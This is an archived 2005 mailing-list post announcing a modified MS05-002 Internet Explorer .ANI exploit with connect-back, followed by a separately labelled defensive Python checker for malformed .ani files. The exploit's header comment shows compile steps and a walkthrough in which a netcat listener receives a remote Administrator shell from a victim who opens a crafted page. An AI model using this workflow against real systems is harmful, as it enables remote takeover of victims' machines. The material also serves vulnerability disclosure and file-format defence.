Fwd: MS05-002 xploit modification - connectback addition

From: Benn Goldman Rivers (benoror_at_gmail.com)
Date: 01/30/05


Date: Sun, 30 Jan 2005 04:59:13 -0600
To: exploits@k-otik.com, contributor@idefense.com, submissions@packetstormsecurity.org, RazaMexicanaVulnList <vuln@raza-mexicana.org>, vuln-dev@securityfocus.com


Filename with greetings ... sorry

On Sun, 30 Jan 2005 00:41:16 -0600, <benoror@gmail.com> wrote:
> /* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2
> *
> * Copyright (c) 2004-2005 WhiskyCoders.
> *
> * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
> * (CAN-2004-1049)
> *
> * WhiskyCoders - http://bennupg.ath.cx
> * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew
> *
> * (universal -- for all affected systems)
> * ---------------------------------------------------------------------
> * Notes:
> * This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
> * http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
> * ---------------------------------------------------------------------
> * Description:
> * A remote code execution vulnerability exists in the way that
> * cursor, animated cursor, and icon formats are handled. An attacker
> * could try to exploit the vulnerability by constructing a malicious
> * cursor or icon file that could potentially allow remote code
> * execution if a user visited a malicious Web site or viewed a
> * malicious e-mail message. An attacker who successfully exploited
> * this vulnerability could take complete control of an affected
> * system.
> *
> * ---------------------------------------------------------------------
> * Patch:
> * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> *
> * ---------------------------------------------------------------------
> * Tested on:
> * - Windows Server 2003
> * - Windows XP SP1
> * - Windows XP SP0
> * - Windows 2000 SP4
> * - Windows 2000 SP3
> * - Windows 2000 SP2
> *
> * ---------------------------------------------------------------------
> * Compile:
> *
> * Win32/VC++ : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Linux : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> *
> * ---------------------------------------------------------------------
> * Example:
> *
> **ATTACKER:
> *
> * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
> * <...>
> * [*] Creating poc.ani file ... Ok
> * [*] Creating poc.html file ... Ok
> *
> * d00d@whiskybox $ netcat -l -p 7778 -v
> *
> **VICTIM:
> *
> * C:\> iexplore C:\poc.html
> *
> **ATTACKER:
> * d00d@whiskybox $ netcat -l -p 7778 -v
> * Microsoft Windows 2000 [Version 5.00.2195]
> * (C) Copyright 1985-2000 Microsoft Corp.
> *
> * C:\Documents and Settings\Administrator\Desktop>
> *
> * ---------------------------------------------------------------------
> *
> * This is provided as proof-of-concept code only for educational
> * purposes and testing by authorized individuals with permission to
> * do so.
> *
> */
>
>
>
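As an added example (not part of the forwarded post, and not code from the WhiskyCoders or houseofdabus exploits), here is a small Python checker a defender could run over cursor or icon files pulled from mail attachments or a browser cache. It walks the RIFF chunk list of an ACON (.ani) file and reports chunks whose declared size runs past the end of the file, and an `anih` header chunk whose declared size differs from the 36-byte ANIHEADER structure documented for the format. The post itself does not describe the parsing defect, so these are generic structural checks rather than a signature for this specific bug; `build_sample_ani` constructs a minimal test file in memory and is not a real cursor.

```python
import struct

# Documented size of the ANI 'anih' header structure (nine 32-bit fields).
ANIHEADER_SIZE = 36


def build_sample_ani(anih_size=ANIHEADER_SIZE):
    """Construct a minimal RIFF/ACON file for testing.

    Constructed sample for this example only; it carries no frames and is
    not a usable cursor. anih_size controls the declared 'anih' chunk length.
    """
    anih_payload = b"\x00" * anih_size
    anih_chunk = b"anih" + struct.pack("<I", anih_size) + anih_payload
    if anih_size % 2:
        anih_chunk += b"\x00"  # RIFF pads odd-length chunks to an even boundary
    body = b"ACON" + anih_chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def check_ani(data):
    """Return a list of structural findings; an empty list means nothing odd was seen."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON file"]

    riff_len = struct.unpack_from("<I", data, 4)[0]
    if riff_len + 8 > len(data):
        findings.append(f"RIFF length {riff_len} exceeds file size {len(data)}")

    # Walk top-level chunks; each is a 4-byte FourCC, a 4-byte little-endian
    # size, then the payload. Nested LIST chunks are skipped as a whole here.
    pos = 12
    end = min(len(data), riff_len + 8)
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        if pos + 8 + size > end:
            findings.append(
                f"chunk {fourcc!r} at offset {pos} declares {size} bytes, beyond file end"
            )
            break
        if fourcc == b"anih" and size != ANIHEADER_SIZE:
            findings.append(
                f"anih chunk declares {size} bytes, expected {ANIHEADER_SIZE}"
            )
        pos += 8 + size + (size & 1)
    return findings


if __name__ == "__main__":
    for label, blob in (
        ("well-formed", build_sample_ani()),
        ("oversized anih", build_sample_ani(anih_size=256)),
        ("truncated", build_sample_ani()[:20]),
    ):
        print(label, "->", check_ani(blob) or "ok")
```

The `anih` size check is the one that matters for a header-structure bug: a file whose declared header length is far larger than the fixed structure should never be opened by a viewer, regardless of whether the bytes are actually present in the file.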